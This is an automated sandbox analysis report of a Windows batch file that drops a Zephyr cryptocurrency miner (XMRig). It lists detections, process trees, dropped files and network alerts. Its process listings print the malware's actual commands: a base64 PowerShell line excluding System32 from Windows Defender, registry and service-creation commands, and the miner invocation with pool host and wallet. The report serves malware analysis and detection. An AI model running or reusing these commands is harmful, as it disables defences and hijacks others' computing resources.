File name:

x269280.bat

Full analysis: https://app.any.run/tasks/38ea2d3e-9100-403a-bfab-ac7fdd6fb45f
Verdict: Malicious activity
Threats:

Crypto mining malware is a resource-intensive threat that infiltrates computers with the purpose of mining cryptocurrencies. This type of threat can be deployed either on an infected machine or a compromised website. In both cases the miner will utilize the computing power of the device and its network bandwidth.

Malware Trends Tracker     >>>
Analysis date: December 23, 2024, 18:19:53
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
zephyr
miner
susp-powershell
evasion
github
xmrig
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5:

C36788578D91842B6781CC4A787FFCE7

SHA1:

ED4B8C7F263EFF747416F1F971EBFED6056FF20A

SHA256:

B89BC4C948D65DB77EA54A7C34ABB0DE5080CBD71B7E8AB38EF78A069B8F825B

SSDEEP:

12:EfQBu0YBKYoV5BQx1ijBG2BGfxBlc09B13Bu09QB1sYocYoU:xBeBQQxaBG2BGfxBe09B1BHQBy

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • ZEPHYR has been detected

      • xcopy.exe (PID: 6564)
      • xcopy.exe (PID: 4388)
      • printui.exe (PID: 6812)
      • svchost.exe (PID: 1876)

    • Adds path to the Windows Defender exclusion list

      • printui.exe (PID: 6812)
      • cmd.exe (PID: 6516)
      • svchost.exe (PID: 1876)
      • cmd.exe (PID: 6896)
      • cmd.exe (PID: 3656)
      • cmd.exe (PID: 4228)
      • cmd.exe (PID: 3992)

    • Uses Task Scheduler to autorun other applications

      • cmd.exe (PID: 2800)

    • Starts CMD.EXE for self-deleting

      • printui.exe (PID: 6812)

    • Creates or modifies Windows services

      • reg.exe (PID: 1200)

    • XMRig has been detected

      • x132158.dat (PID: 2092)
      • x132158.dat (PID: 5320)

    • MINER has been detected (SURICATA)

      • x132158.dat (PID: 2092)
      • x132158.dat (PID: 5320)

    • Connects to the CnC server

      • x132158.dat (PID: 2092)
      • x132158.dat (PID: 5320)

  • SUSPICIOUS

    • Starts application with an unusual extension

      • cmd.exe (PID: 6200)
      • cmd.exe (PID: 5788)
      • cmd.exe (PID: 1668)
      • cmd.exe (PID: 6308)

    • Executable content was dropped or overwritten

      • xcopy.exe (PID: 6564)
      • xcopy.exe (PID: 4388)
      • printui.exe (PID: 6812)
      • svchost.exe (PID: 1876)

    • Process copies executable file

      • cmd.exe (PID: 6200)
      • cmd.exe (PID: 5788)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 4716)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 4716)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 4716)
      • printui.exe (PID: 6812)
      • console_zero.exe (PID: 2728)
      • svchost.exe (PID: 1876)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2008)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 2124)
      • cmd.exe (PID: 6516)
      • cmd.exe (PID: 4228)
      • cmd.exe (PID: 3656)
      • cmd.exe (PID: 6896)
      • cmd.exe (PID: 3992)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 2124)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 6516)
      • cmd.exe (PID: 3656)
      • cmd.exe (PID: 4228)
      • cmd.exe (PID: 6896)
      • cmd.exe (PID: 3992)

    • Starts SC.EXE for service management

      • cmd.exe (PID: 3552)

    • Creates a new Windows service

      • sc.exe (PID: 6596)

    • Windows service management via SC.EXE

      • sc.exe (PID: 1544)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 3552)

    • The process deletes folder without confirmation

      • printui.exe (PID: 6812)

    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 3092)
      • cmd.exe (PID: 3692)

    • Process drops legitimate windows executable

      • printui.exe (PID: 6812)

    • The process drops C-runtime libraries

      • printui.exe (PID: 6812)

    • Connects to the server without a host name

      • svchost.exe (PID: 1876)

    • Connects to unusual port

      • svchost.exe (PID: 1876)
      • x132158.dat (PID: 2092)
      • x132158.dat (PID: 5320)

    • Checks for external IP

      • svchost.exe (PID: 1876)
      • svchost.exe (PID: 2192)

    • Process uses ARP to discover network configuration

      • cmd.exe (PID: 5092)

    • Drops a system driver (possible attempt to evade defenses)

      • svchost.exe (PID: 1876)

    • Uses pipe srvsvc via SMB (transferring data)

      • svchost.exe (PID: 1876)

    • Potential Corporate Privacy Violation

      • x132158.dat (PID: 2092)
      • x132158.dat (PID: 5320)

    • Crypto Currency Mining Activity Detected

      • x132158.dat (PID: 2092)

  • INFO

    • The sample compiled with english language support

      • xcopy.exe (PID: 6564)
      • printui.exe (PID: 6812)
      • xcopy.exe (PID: 4388)

    • Checks supported languages

      • chcp.com (PID: 6404)
      • chcp.com (PID: 5256)
      • printui.exe (PID: 6812)
      • console_zero.exe (PID: 2728)
      • x132158.dat (PID: 2092)
      • tmpz64.exe (PID: 3208)
      • x132158.dat (PID: 5320)

    • Changes the display of characters in the console

      • cmd.exe (PID: 6200)
      • cmd.exe (PID: 5788)

    • Reads security settings of Internet Explorer

      • explorer.exe (PID: 6524)
      • explorer.exe (PID: 4548)

    • Manual execution by a user

      • WinRAR.exe (PID: 6416)
      • wscript.exe (PID: 4716)

    • The process uses the downloaded file

      • WinRAR.exe (PID: 6416)
      • wscript.exe (PID: 4716)
      • cmd.exe (PID: 5788)
      • powershell.exe (PID: 6632)
      • powershell.exe (PID: 3140)
      • powershell.exe (PID: 7100)
      • powershell.exe (PID: 5912)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7148)
      • powershell.exe (PID: 2008)
      • powershell.exe (PID: 3140)
      • powershell.exe (PID: 7100)
      • powershell.exe (PID: 6632)
      • powershell.exe (PID: 5912)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 2008)
      • powershell.exe (PID: 7148)
      • powershell.exe (PID: 3140)
      • powershell.exe (PID: 7100)
      • powershell.exe (PID: 6632)
      • powershell.exe (PID: 5912)

    • Found Base64 encoded access to Windows Defender via PowerShell (YARA)

      • printui.exe (PID: 6812)

    • Reads the computer name

      • console_zero.exe (PID: 2728)
      • x132158.dat (PID: 2092)
      • x132158.dat (PID: 5320)

    • The sample compiled with japanese language support

      • svchost.exe (PID: 1876)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
197
Monitored processes
69
Malicious processes
11
Suspicious processes
7

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs chcp.com no specs explorer.exe no specs explorer.exe no specs #ZEPHYR xcopy.exe xcopy.exe no specs winrar.exe no specs rundll32.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs explorer.exe no specs explorer.exe no specs #ZEPHYR xcopy.exe xcopy.exe no specs printui.exe no specs printui.exe no specs #ZEPHYR printui.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs sc.exe no specs reg.exe no specs sc.exe no specs cmd.exe no specs conhost.exe no specs console_zero.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs timeout.exe no specs timeout.exe no specs cmd.exe conhost.exe no specs schtasks.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs #ZEPHYR svchost.exe svchost.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs #MINER x132158.dat arp.exe no specs cmd.exe no specs conhost.exe no specs #MINER x132158.dat cmd.exe no specs conhost.exe no specs tmpz64.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
848\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1200reg add HKLM\SYSTEM\CurrentControlSet\services\x331445\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x331445.dat" /f C:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1448arp -aC:\Windows\System32\ARP.EXEcmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
TCP/IP Arp Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\arp.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\snmpapi.dll
c:\windows\system32\nsi.dll
1520\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1544sc start x331445C:\Windows\System32\sc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Service Control Manager Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1668cmd.exe /c x132158.dat -o zeph.2miners.com:2222 -u ZEPHsCzKB2ZGWC6JHdKvUo6G8wdTPeuwiAhEYfMqBjn7hAAhVe9gWjtFoboAMtrnHaeH7coq9UpVA1CCvkLHojHyWf2UXpBHHj7 --rig-id=rig_00 --max-cpu-usage=50C:\Windows\System32\cmd.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1876C:\Windows\System32\svchost.exe -k DcomLaunchC:\Windows\System32\svchost.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\x331445.dat
c:\windows\system32\advapi32.dll
2008powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
2092x132158.dat -o zeph.2miners.com:2222 -u ZEPHsCzKB2ZGWC6JHdKvUo6G8wdTPeuwiAhEYfMqBjn7hAAhVe9gWjtFoboAMtrnHaeH7coq9UpVA1CCvkLHojHyWf2UXpBHHj7 --rig-id=rig_00 --max-cpu-usage=50C:\Windows\System32\winsvcf\x132158.dat
cmd.exe
User:
SYSTEM
Company:
www.xmrig.com
Integrity Level:
SYSTEM
Description:
XMRig miner
Exit code:
0
Version:
6.22.0
Modules
Images
c:\windows\system32\winsvcf\x132158.dat
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
2124cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"C:\Windows\System32\cmd.exeprintui.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
Total events
48 859
Read events
48 802
Write events
56
Delete events
1

Modification events

(PID) Process:(6524) explorer.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation:writeName:NodeSlots
Value:
02020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202
(PID) Process:(6524) explorer.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation:writeName:MRUListEx
Value:
040000000E0000000300000000000000100000000F0000000C0000000D0000000B000000050000000A000000090000000800000001000000070000000600000002000000FFFFFFFF
(PID) Process:(6524) explorer.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4
Operation:writeName:MRUListEx
Value:
040000000000000005000000020000000100000003000000FFFFFFFF
(PID) Process:(6524) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Toolbar
Operation:writeName:Locked
Value:
1
(PID) Process:(6524) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ribbon
Operation:writeName:MinimizedStateTabletModeOff
Value:
0
(PID) Process:(6524) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Ribbon
Operation:writeName:QatItems
Value:
3C7369713A637573746F6D554920786D6C6E733A7369713D22687474703A2F2F736368656D61732E6D6963726F736F66742E636F6D2F77696E646F77732F323030392F726962626F6E2F716174223E3C7369713A726962626F6E206D696E696D697A65643D2266616C7365223E3C7369713A71617420706F736974696F6E3D2230223E3C7369713A736861726564436F6E74726F6C733E3C7369713A636F6E74726F6C206964513D227369713A3136313238222076697369626C653D2266616C73652220617267756D656E743D223022202F3E3C7369713A636F6E74726F6C206964513D227369713A3136313239222076697369626C653D2266616C73652220617267756D656E743D223022202F3E3C7369713A636F6E74726F6C206964513D227369713A3132333532222076697369626C653D2266616C73652220617267756D656E743D223022202F3E3C7369713A636F6E74726F6C206964513D227369713A3132333834222076697369626C653D22747275652220617267756D656E743D223022202F3E3C7369713A636F6E74726F6C206964513D227369713A3132333336222076697369626C653D22747275652220617267756D656E743D223022202F3E3C7369713A636F6E74726F6C206964513D227369713A3132333537222076697369626C653D2266616C73652220617267756D656E743D223022202F3E3C2F7369713A736861726564436F6E74726F6C733E3C2F7369713A7161743E3C2F7369713A726962626F6E3E3C2F7369713A637573746F6D55493E
(PID) Process:(6524) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser
Operation:writeName:ITBar7Layout
Value:
13000000000000000000000020000000100000000000000001000000010700005E01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(6524) explorer.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\119\Shell
Operation:writeName:SniffedFolderType
Value:
Documents
(PID) Process:(6524) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:GlobalAssocChangedCounter
Value:
105
(PID) Process:(6524) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
Operation:writeName:LastUpdate
Value:
D1A9696700000000
Executable files
18
Suspicious files
5
Text files
23
Unknown types
0

Dropped files

PID
Process
Filename
Type
6416WinRAR.exeC:\Users\admin\Desktop\test\rootdir\x325336.dat
MD5:
SHA256:
5788cmd.exeC:\Windows \System32\printui.dll
MD5:
SHA256:
5244xcopy.exeC:\Windows \System32\x325336.dat
MD5:
SHA256:
6416WinRAR.exeC:\Users\admin\Desktop\test\rootdir\x269280.battext
MD5:C36788578D91842B6781CC4A787FFCE7
SHA256:B89BC4C948D65DB77EA54A7C34ABB0DE5080CBD71B7E8AB38EF78A069B8F825B
6416WinRAR.exeC:\Users\admin\Desktop\test\rootdir\rootcomp.dattext
MD5:4BE1062CC854A22D081E4E48A7440A56
SHA256:CC5B8927042C9C363ED9D5301BC4E5ADBD3EB090562ADABC5B1461AD46598B54
6812printui.exeC:\Windows\System32\svculdr64.datexecutable
MD5:274B1840839ADB90CE331A7C702BD83A
SHA256:469CCF15CFAAD396E385C553E4EAB9239A10BAB1C7D6505D31D38FB1C15AE4BF
2008powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ra4iez45.vcl.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2008powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_h1rcgykx.i2w.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6564xcopy.exeC:\Windows \System32\printui.exeexecutable
MD5:E43252474ADF63E69B1FC65D202D88C3
SHA256:53DB039D9D46F2F3F80DF42C8BA48BB96CE4FB96C1BFCE5CD61514A7FF369411
6416WinRAR.exeC:\Users\admin\Desktop\test\NEW VOLUME.lnkbinary
MD5:498665E7A1985CA18C28653744F146E8
SHA256:3CC67C231B236B1BE933A7EAB1389C3119F8E33FBEC11115733C59587ECB4E8B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
20
TCP/UDP connections
76
DNS requests
37
Threats
11

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.48.23.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
760
lsass.exe
GET
200
69.192.161.44:80
http://x1.c.lencr.org/
unknown
whitelisted
7120
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7120
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
1876
svchost.exe
HEAD
404
45.94.31.128:80
http://unvdwl.com/un1/unvurestorehardx.dat
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
2736
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4712
MoUsoCoreWorker.exe
23.48.23.176:80
crl.microsoft.com
Akamai International B.V.
DE
unknown
23.48.23.176:80
crl.microsoft.com
Akamai International B.V.
DE
unknown
4712
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5064
SearchApp.exe
92.123.104.38:443
www.bing.com
Akamai International B.V.
DE
unknown
5064
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
1176
svchost.exe
20.190.159.4:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 23.48.23.176
  • 23.48.23.164
  • 23.48.23.167
whitelisted
www.microsoft.com
  • 23.35.229.160
  • 88.221.169.152
whitelisted
google.com
  • 172.217.16.142
whitelisted
www.bing.com
  • 92.123.104.38
  • 92.123.104.31
  • 92.123.104.34
  • 92.123.104.32
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.159.4
  • 20.190.159.23
  • 20.190.159.71
  • 40.126.31.73
  • 20.190.159.75
  • 40.126.31.69
  • 20.190.159.73
  • 20.190.159.2
whitelisted
go.microsoft.com
  • 23.35.238.131
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted

Threats

PID
Process
Class
Message
1876
svchost.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup SSL Cert Observed (ipinfo .io)
1876
svchost.exe
Device Retrieving External IP Address Detected
ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
2192
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io)
1876
svchost.exe
Misc activity
ET INFO Observed Google DNS over HTTPS Domain (dns .google in TLS SNI)
1876
svchost.exe
Misc activity
ET INFO Google DNS Over HTTPS Certificate Inbound
2192
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
2092
x132158.dat
Potential Corporate Privacy Violation
ET POLICY Cryptocurrency Miner Checkin
2092
x132158.dat
Potential Corporate Privacy Violation
ET POLICY Cryptocurrency Miner Checkin
5320
x132158.dat
Potential Corporate Privacy Violation
ET POLICY Cryptocurrency Miner Checkin
5320
x132158.dat
Potential Corporate Privacy Violation
ET POLICY Cryptocurrency Miner Checkin
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
x269280.bat